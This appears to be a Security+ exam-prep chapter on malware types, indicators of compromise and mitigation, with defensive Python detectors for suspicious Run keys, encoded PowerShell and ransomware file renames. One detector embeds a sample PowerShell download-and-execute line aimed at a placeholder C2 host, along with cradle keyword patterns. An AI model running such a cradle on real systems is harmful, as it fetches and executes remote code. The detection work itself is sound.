SY0-701 | Chapter 9 of 212 | Objective 2.4

Malware Types and Characteristics

Malware is any software intentionally designed to cause damage, disrupt operations, or gain unauthorized access to computer systems. This chapter covers the various types of malware, their characteristics, and how they operate, which is critical for the SY0-701 exam under Objective 2.4: 'Given a scenario, analyze indicators of malicious activity.' Mastering malware types helps you identify and respond to threats effectively in both the exam and real-world IT security roles.

25 min read
Beginner
Updated May 31, 2026

Malware as Biological Pathogens

Imagine the human immune system defending against pathogens. A virus is a microscopic particle that hijacks a host cell to replicate, much like a computer virus attaches to a legitimate program and uses system resources to copy itself. A worm is like a parasite that can move through the bloodstream independently, exploiting network vulnerabilities to spread without a host file. Trojan horses are like a benign-looking pill that contains poison; they pose as useful software but execute malicious actions. Ransomware is like a disease that locks down a vital organ and demands a ransom for the antidote. Spyware is like a hidden camera that monitors your activities and reports back. Rootkits are like a pathogen that hides deep in the body's core systems, evading detection by altering immune responses. Botnets are like a coordinated swarm of insects controlled by a single entity to attack a target. Each malware type has a unique mechanism, just as each pathogen has a specific mode of infection and replication. Understanding these mechanisms helps in developing countermeasures, just as vaccines and antibiotics target specific biological processes.

How It Actually Works

What is Malware?

Malware (malicious software) is a broad term encompassing viruses, worms, Trojans, ransomware, spyware, adware, rootkits, bootkits, backdoors, logic bombs, and fileless malware. Each type has distinct infection vectors, behaviors, and payloads. Understanding these is essential for threat analysis and incident response.

Virus Characteristics

A virus is a self-replicating program that attaches itself to a legitimate executable or script. It requires user action (e.g., opening a file) to activate. Once executed, it copies itself into other programs or system areas. Viruses can corrupt files, steal data, or create backdoors. Common types include:

- File infector virus: Attaches to .exe or .com files.
- Macro virus: Written in macro languages (e.g., VBA) embedded in documents.
- Boot sector virus: Infects the Master Boot Record (MBR) or Volume Boot Record (VBR).
- Polymorphic virus: Changes its code signature on each replication to evade antivirus.
- Metamorphic virus: Rewrites its entire code to avoid detection.

Example: The CIH virus (Chernobyl) overwrote the BIOS, rendering systems unbootable.

Worm Characteristics

A worm is standalone malware that replicates without user intervention, exploiting network vulnerabilities or misconfigurations. It uses network protocols (e.g., SMB, HTTP) to spread. Worms often carry payloads like backdoors or DDoS agents. The Morris worm (1988) exploited buffer overflows in sendmail and finger, infecting ~10% of internet-connected systems.

Trojan Horse Characteristics

A Trojan disguises itself as legitimate software (e.g., a game or utility) but contains malicious code. Unlike viruses and worms, Trojans do not self-replicate. They rely on social engineering to trick users into installing them. Common Trojans:

- Remote Access Trojan (RAT): Gives the attacker full control of the host (e.g., PoisonIvy, DarkComet).
- Banking Trojan: Steals financial credentials (e.g., Zeus, Emotet).
- Dropper Trojan: Installs other malware.

Ransomware

Ransomware encrypts files or locks systems and demands payment (usually cryptocurrency) for decryption. Two main types:

- Encrypting ransomware: Encrypts files using AES or RSA (e.g., CryptoLocker, WannaCry).
- Locker ransomware: Locks the entire system (e.g., WinLocker).

WannaCry (2017) exploited EternalBlue (CVE-2017-0144) in SMBv1 to spread rapidly, affecting 230,000+ systems.

Spyware and Adware

Spyware covertly collects user data (keystrokes, browsing habits) and sends it to attackers. Adware displays unwanted ads, often bundled with free software. Both degrade performance and compromise privacy. Keyloggers capture keystrokes; browser hijackers redirect searches.

Rootkits and Bootkits

A rootkit hides malicious activity by modifying the OS kernel or using kernel-mode drivers. It achieves persistence and stealth, often undetected by standard antivirus. Bootkits infect the boot process (MBR, UEFI), loading before the OS. Example: The Sony BMG rootkit (2005) hid copy-protection software, creating a backdoor.

Backdoor and Logic Bomb

A backdoor bypasses normal authentication to give attackers remote access. It is often left behind by Trojans or worms. A logic bomb is code triggered by a specific event (e.g., a date or user action). Example: A disgruntled employee sets a logic bomb to delete files on their termination date.

Fileless Malware

Fileless malware operates in memory without writing files to disk, evading signature-based detection. It uses legitimate tools like PowerShell, WMI, or .NET to execute payloads. Attackers inject code into running processes (e.g., via reflective DLL injection). Example: The PowerShell-based malware Kovter.

Commands and Examples

Use netstat -ano to find suspicious connections.

tasklist /svc shows running services.

wmic process list enumerates running processes with their executable paths.

For rootkit detection, use chkrootkit (Linux) or GMER (Windows).

Ransomware often leaves ransom notes like @[decrypt].txt.

Indicators of Compromise (IoCs)

Common IoCs include:

Unusual network traffic (e.g., C2 communication on non-standard ports).

File changes (e.g., renamed executables, new scheduled tasks).

Registry modifications (e.g., HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run).

System slowdowns, pop-ups, disabled security tools.
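As an added example (not code from the original page), the following Python script parses a constructed Run-key export in .reg format and flags the registry IoCs listed above: entries launched from user-writable directories, entries that invoke a script host or carry an encoded PowerShell command, and executables that borrow a system binary's name outside the Windows directory. The sample entries and the heuristic lists are assumptions for illustration, not a vendor's ruleset.

```python
import re
# Constructed sample: a trimmed Run-key export in .reg format (as produced by reg export).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"
"WinUpdate"="C:\\Users\\bob\\AppData\\Roaming\\svchost.exe"
"Helper"="wscript.exe //B \"C:\\Users\\bob\\AppData\\Local\\Temp\\upd.vbs\""
"Sync"="powershell.exe -w hidden -enc SQBFAFgA"
'''

# Heuristic lists (illustrative assumptions, not a product ruleset).
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "cmd.exe")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
SYSTEM_NAMES = ("svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "explorer.exe")
# .reg string values look like "name"="value", with \\ and \" escapes inside the quotes.
_ENTRY = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')

def _unescape(s):
    return re.sub(r"\\(.)", r"\1", s)

def parse_run_key(reg_text):
    """Return {value_name: command_line} for every string value in the export."""
    entries = {}
    for line in reg_text.splitlines():
        m = _ENTRY.match(line.strip())
        if m:
            entries[_unescape(m.group(1))] = _unescape(m.group(2))
    return entries

def _executable(command):
    if command.startswith('"'):  # quoted path: everything up to the closing quote
        return command[1:command.find('"', 1)]
    return command.split(" ", 1)[0]

def flag_entry(command):
    """Return the reasons this Run-key command looks suspicious (empty list if none)."""
    low = command.lower()
    exe = _executable(command).lower()
    reasons = []
    if any(host in low for host in SCRIPT_HOSTS):
        reasons.append("script host or LOLBin")
    if any(d in low for d in USER_WRITABLE):
        reasons.append("user-writable location")
    if exe.rsplit("\\", 1)[-1] in SYSTEM_NAMES and "\\windows\\" not in exe:
        reasons.append("system binary name outside Windows directory")
    if re.search(r"-e(?:c|nc|ncodedcommand)?\s", low):
        reasons.append("encoded PowerShell command")
    return reasons

def triage_run_key(reg_text):
    """Map each flagged value name to its reasons; clean entries are omitted."""
    return {name: flag_entry(cmd) for name, cmd in parse_run_key(reg_text).items()
            if flag_entry(cmd)}
```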

Mitigation

Use antivirus/anti-malware with heuristic and behavioral analysis.

Enable Windows Defender or EDR solutions.

Apply patches promptly (e.g., MS17-010 for EternalBlue).

Implement least privilege and application whitelisting.

Use network segmentation and intrusion detection systems (IDS).

Regular backups stored offline.

User training to avoid phishing and suspicious downloads.

Walk-Through

1. Infection Vector Identification

Malware enters a system via vectors like email attachments (phishing), malicious downloads, USB drives, drive-by downloads, or exploiting unpatched vulnerabilities. For example, a user opens a phishing email with a macro-enabled Word document. The macro downloads and executes the payload. Tools like email filters and sandboxes can detect malicious attachments. Logs show the inbound email, the file download, and eventual execution.

2. Execution and Persistence

Once executed, malware establishes persistence to survive reboots. Common techniques: writing to registry Run keys (`HKCU\Software\Microsoft\Windows\CurrentVersion\Run`), creating scheduled tasks, installing as a service, or using bootkits. For example, a rootkit modifies the MBR. Tools like `autoruns` can reveal persistence mechanisms. Event logs (e.g., Event ID 4698 for scheduled tasks) show creation.

3. Privilege Escalation

Malware often escalates privileges to gain admin access. Techniques include exploiting vulnerabilities (e.g., CVE-2020-0787), using credential dumping (Mimikatz), or token manipulation. After escalation, it can disable security software. Logs show privilege use events (Event ID 4672) or unusual process elevation. Tools like Sysmon can detect `lsass.exe` access.

4. Defense Evasion

Malware avoids detection by obfuscating code, packing executables, using encryption, or disabling AV. Fileless malware runs in memory. Rootkits hook system calls. Polymorphic viruses change signatures. Logs may show process hollowing or DLL injection. EDR tools detect anomalous behavior like PowerShell downloading code from the internet.

5. Payload Delivery and Impact

The final payload executes: ransomware encrypts files, spyware exfiltrates data, worm spreads to other systems. For ransomware, file extensions change (e.g., `.encrypted`), ransom notes appear. Data exfiltration uses DNS tunneling or HTTP POST. Network logs show large outbound transfers to unknown IPs. Incident responders isolate the host and analyze the payload.
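As an added example of the defense-evasion check described in the walk-through (and of the powershell.exe encoded-command alert in Scenario 3), this Python snippet decodes the -EncodedCommand argument from constructed process-creation log lines and flags download cradles. The log line format, the field names and the keyword list are assumptions for illustration, not part of the original page or of any product.

```python
import base64
import re

# Constructed sample: the encoded command is built here so the sample log stays
# self-consistent; a real process-creation event would already carry it encoded.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/p.ps1')"
SAMPLE_ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_LOG = [
    # Hidden-window PowerShell launched from Explorer with an encoded download cradle.
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ParentImage=C:\\Windows\\explorer.exe "
    f'CommandLine="powershell.exe -NoP -W Hidden -enc {SAMPLE_ENC}"',
    # Admin script run from a console: no encoding, no cradle, should not be flagged.
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ParentImage=C:\\Windows\\System32\\cmd.exe "
    'CommandLine="powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"',
]

# PowerShell accepts unambiguous prefixes of -EncodedCommand; these are the usual spellings.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Keywords typical of in-memory download-and-execute cradles.
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|Invoke-Expression|"
                    r"FromBase64String|Net\.WebClient", re.IGNORECASE)

def decode_encoded_command(cmdline):
    """Return the decoded script of an -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        # -EncodedCommand is Base64 over UTF-16LE text, not UTF-8.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(log_lines):
    """Return one finding per suspicious powershell.exe process-creation line."""
    findings = []
    for line in log_lines:
        if "powershell.exe" not in line.lower():
            continue
        m = re.search(r'CommandLine="(.*)"$', line)
        cmd = m.group(1) if m else ""
        decoded = decode_encoded_command(cmd)
        reasons = []
        if decoded is not None:
            reasons.append("encoded command")
            if CRADLE.search(decoded):
                reasons.append("download cradle in decoded script")
        if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.IGNORECASE):
            reasons.append("hidden window")
        if reasons:
            findings.append({"cmdline": cmd, "decoded": decoded, "reasons": reasons})
    return findings
```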

What This Looks Like on the Job

Scenario 1: Ransomware Outbreak at a Hospital

A hospital's IT team notices files on a file server have been renamed with the .encrypted extension and a ransom note HowToDecrypt.txt appears. The attack started when an employee opened a phishing email with a malicious Excel macro. The macro downloaded LockBit ransomware, which then encrypted network shares using AES-256. The attacker demanded 50 BTC. The SOC used EDR logs to trace the initial execution, identified the user's machine, and isolated it. They restored files from offline backups, avoiding payment. Common mistake: paying the ransom, which funds attackers and may not guarantee decryption.
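As an added example (not from the original page), the following Python detector reproduces the Scenario 1 indicators over constructed file-server events: a burst of renames to one new extension by a single process, plus the creation of a ransom-note-like file by that process. The event format, the thresholds and the note-name keywords are assumptions for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta
import ntpath
import re

# Ransom notes are named to be found: "decrypt", "restore", "readme" and the like.
RANSOM_NOTE = re.compile(r"decrypt|restore|recover|readme|how_?to", re.IGNORECASE)

def constructed_events():
    """Constructed file-server events: (timestamp, process, op, path[, new_path])."""
    events = [("2024-05-31T10:20:01", "winword.exe", "write", r"\\fs01\share\report.docx")]
    base = datetime(2024, 5, 31, 10, 22, 0)
    for i in range(12):  # one process renames 12 files to .encrypted within 22 seconds
        path = rf"\\fs01\share\doc{i}.docx"
        events.append(((base + timedelta(seconds=2 * i)).isoformat(),
                       "upd.exe", "rename", path, path + ".encrypted"))
    events.append(((base + timedelta(seconds=25)).isoformat(),
                   "upd.exe", "create", r"\\fs01\share\HowToDecrypt.txt"))
    # An ordinary single rename by a user must not trip the detector.
    events.append(("2024-05-31T10:30:00", "explorer.exe", "rename",
                   r"\\fs01\share\old.txt", r"\\fs01\share\old.bak"))
    return events

def detect_ransomware(events, window=timedelta(seconds=60), threshold=10):
    """Alert when one process changes >= threshold files to the same new extension
    inside `window`; attach any ransom-note-looking files that process created."""
    renames = defaultdict(list)  # (process, new extension) -> rename timestamps
    notes = defaultdict(list)    # process -> created files that look like ransom notes
    for ev in events:
        ts, proc, op = datetime.fromisoformat(ev[0]), ev[1], ev[2]
        if op == "rename":
            old_ext = ntpath.splitext(ev[3])[1].lower()
            new_ext = ntpath.splitext(ev[4])[1].lower()
            if new_ext and new_ext != old_ext:
                renames[(proc, new_ext)].append(ts)
        elif op == "create" and RANSOM_NOTE.search(ntpath.basename(ev[3])):
            notes[proc].append(ev[3])
    alerts = []
    for (proc, ext), times in renames.items():
        times.sort()
        burst, j = 0, 0
        for i, t in enumerate(times):  # largest number of renames inside any one window
            while t - times[j] > window:
                j += 1
            burst = max(burst, i - j + 1)
        if burst >= threshold:
            alerts.append({"process": proc, "extension": ext, "burst": burst,
                           "ransom_notes": notes.get(proc, [])})
    return alerts
```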

Scenario 2: Bank Trojan Stealing Credentials

A financial institution detects unusual outbound traffic from a teller's workstation to a foreign IP on port 443. The workstation has the Zeus banking Trojan, which captures keystrokes and web form data. The infection vector was a drive-by download from a compromised ad network. The SOC used network traffic analysis (e.g., Zeek logs) to identify the C2 communication. They blocked the IP, scanned the host, and removed the malware. Common mistake: assuming HTTPS traffic is safe; attackers use SSL to hide C2 traffic.

Scenario 3: Fileless Malware in a Corporate Network

An enterprise EDR alerts on powershell.exe spawning cmd.exe with encoded commands. The fileless malware uses PowerShell to download and execute a payload in memory. The attacker exploited an unpatched vulnerability in Internet Explorer (CVE-2018-8653). The SOC investigated by capturing memory dumps and analyzing PowerShell script blocks. They patched the vulnerability and blocked PowerShell execution from untrusted sources. Common mistake: ignoring PowerShell alerts as administrative activity.

How SY0-701 Actually Tests This

SY0-701 Testing Focus

Objective 2.4 requires you to analyze indicators of malicious activity. The exam tests your ability to identify malware types from given scenarios. Key sub-objectives:

Differentiate between viruses, worms, Trojans, ransomware, spyware, adware, rootkits, and fileless malware.

Recognize characteristics: self-replication (virus/worm), stealth (rootkit), encryption (ransomware), social engineering (Trojan).

Identify common IoCs: unusual network traffic, file changes, registry modifications, processes, services.

Common Wrong Answers

1. Virus vs. Worm: Candidates often think both need user action. Reality: worms spread automatically. Wrong choice if the scenario says "spreads without user interaction".

2. Trojan vs. Backdoor: Not all Trojans are backdoors; Trojans may deliver other payloads. A backdoor is a specific type of Trojan that provides access.

3. Spyware vs. Adware: Spyware collects data; adware shows ads. Both can be unwanted, but spyware is stealthy.

4. Rootkit vs. Bootkit: Rootkits operate at kernel level; bootkits infect the boot process. Both hide, but bootkits load earlier.

Specific Terms

Polymorphic: Changes signature each infection.

Metamorphic: Rewrites code entirely.

RAT: Remote Access Trojan.

C2: Command and Control.

Mimikatz: Credential dumping tool.

Trick Questions

Scenario: "Malware that replicates and spreads via network shares" — answer worm, not virus.

Scenario: "Malware that hides by modifying the MBR" — answer bootkit, not rootkit.

Scenario: "Malware that encrypts files and demands payment" — answer ransomware, not Trojan.

Decision Rule

For scenario questions, identify the key behavior: self-replication -> worm; user action required -> virus; disguise -> Trojan; encryption -> ransomware; stealth -> rootkit/bootkit; data theft -> spyware; no file on disk -> fileless. Eliminate options that contradict the behavior.

Key Takeaways

Malware types: virus (self-replicating, needs host), worm (self-replicating, standalone), Trojan (disguised), ransomware (encrypts/locks), spyware (data theft), adware (ads), rootkit (hides in kernel), bootkit (infects boot process), fileless (memory-only).

WannaCry ransomware exploited EternalBlue (CVE-2017-0144) in SMBv1 on port 445.

Polymorphic malware changes its signature each replication; metamorphic rewrites its code.

Ransomware often uses AES for encryption and RSA for key exchange.

Rootkits can be detected by booting from a trusted CD/USB and using offline scanners like GMER or chkrootkit.

Fileless malware often uses PowerShell, WMI, or .NET; logs show `powershell.exe` with encoded commands.

Common IoCs: unusual network traffic (C2), registry changes, new scheduled tasks, disabled security services.

Mitigation: patch management, application whitelisting, least privilege, backups, user training, EDR.

On SY0-701, key differentiator: replication method (virus vs worm), stealth (rootkit vs bootkit), payload (ransomware encryption).

Always verify malware type by behavior: self-spreading = worm, encryption = ransomware, hidden = rootkit/bootkit.

Easy to Mix Up

These come up on the exam all the time. Here's how to tell them apart.

Virus

Requires user action to execute

Attaches to host files or programs

Replicates by infecting other files

Often spreads via removable media or email attachments

Example: CIH virus

Worm

Self-replicates without user intervention

Standalone executable

Exploits network vulnerabilities to spread

Consumes network bandwidth

Example: Morris worm

Trojan

Disguises as legitimate software

Does not self-replicate

May deliver various payloads (RAT, spyware, etc.)

Relies on social engineering

Example: Zeus Trojan

Backdoor

A type of Trojan that provides remote access

Bypasses authentication

Often used for persistent control

Can be installed by other malware

Example: PoisonIvy RAT

Watch Out for These

Mistake

All malware that spreads is a virus.

Correct

Worms spread automatically without user action; viruses require user interaction to propagate.

Mistake

Trojans can replicate themselves like viruses.

Correct

Trojans do not self-replicate; they rely on social engineering to trick users into installing them.

Mistake

Ransomware always encrypts all files immediately.

Correct

Some ransomware (locker) locks the system without encryption, and some encrypt files gradually to avoid detection.

Mistake

Fileless malware cannot be detected by antivirus.

Correct

Fileless malware can be detected by behavioral analysis, memory scanning, and EDR tools, though it evades signature-based detection.

Mistake

Rootkits only affect the operating system kernel.

Correct

Rootkits can also affect user-mode applications, hypervisors (hypervisor rootkits), or firmware.

Frequently Asked Questions

What is the difference between a virus and a worm on Security+?

A virus requires user action (e.g., opening a file) to execute and replicate, attaching itself to legitimate programs. A worm is standalone and self-replicates without user intervention, exploiting network vulnerabilities. For the exam, if a scenario says 'spreads automatically across the network,' choose worm; if it says 'attached to an email attachment and executed by user,' choose virus.

What is a rootkit and how does it hide?

A rootkit is a set of tools that hides malicious activity by modifying the operating system kernel or using kernel-mode drivers. It can intercept system calls to hide files, processes, and registry keys from standard tools. For example, a rootkit might hook the `ZwQuerySystemInformation` API to hide processes. Detection often requires booting from a trusted medium and using specialized scanners.

How does fileless malware work?

Fileless malware operates in memory without writing files to disk, making it hard for signature-based antivirus to detect. It uses legitimate system tools like PowerShell, WMI, or .NET to execute code. For instance, an attacker sends a phishing email with a malicious link that downloads a PowerShell script in memory. The script then downloads and runs a payload (e.g., Mimikatz) without touching the hard drive.

What is the difference between ransomware and a Trojan?

Ransomware is malware that encrypts files or locks the system and demands payment for decryption. A Trojan is a type of malware disguised as legitimate software that may perform various malicious actions, including delivering ransomware. However, not all Trojans are ransomware; Trojans can also spy, steal data, or create backdoors. On the exam, if the scenario mentions encryption and a ransom note, choose ransomware.

What are indicators of a malware infection?

Common indicators include: unexpected system slowdowns, frequent crashes, unusual network traffic (e.g., connections to unknown IPs), new files or renamed files, changes to registry keys (especially Run keys), disabled security software, pop-up ads, and ransom notes. For example, in a ransomware attack, you might see files with `.encrypted` extension and a text file named `HOW_TO_DECRYPT.txt`.

What is a logic bomb?

A logic bomb is a piece of malicious code that executes when a specific condition is met, such as a date, time, or user action. It is often inserted by insiders with legitimate access. For example, a disgruntled employee might set a logic bomb to delete critical files on the day they are terminated. Unlike other malware, logic bombs do not replicate and are not standalone; they are embedded in legitimate programs.

How can I prevent ransomware attacks?

Prevention includes: regular offline backups, patch management (especially for SMB vulnerabilities like EternalBlue), user training to avoid phishing, application whitelisting, disabling macros in Office documents, using email filtering, and implementing the principle of least privilege. Additionally, network segmentation can limit ransomware spread. For the exam, remember that backups are the most effective defense against ransomware.
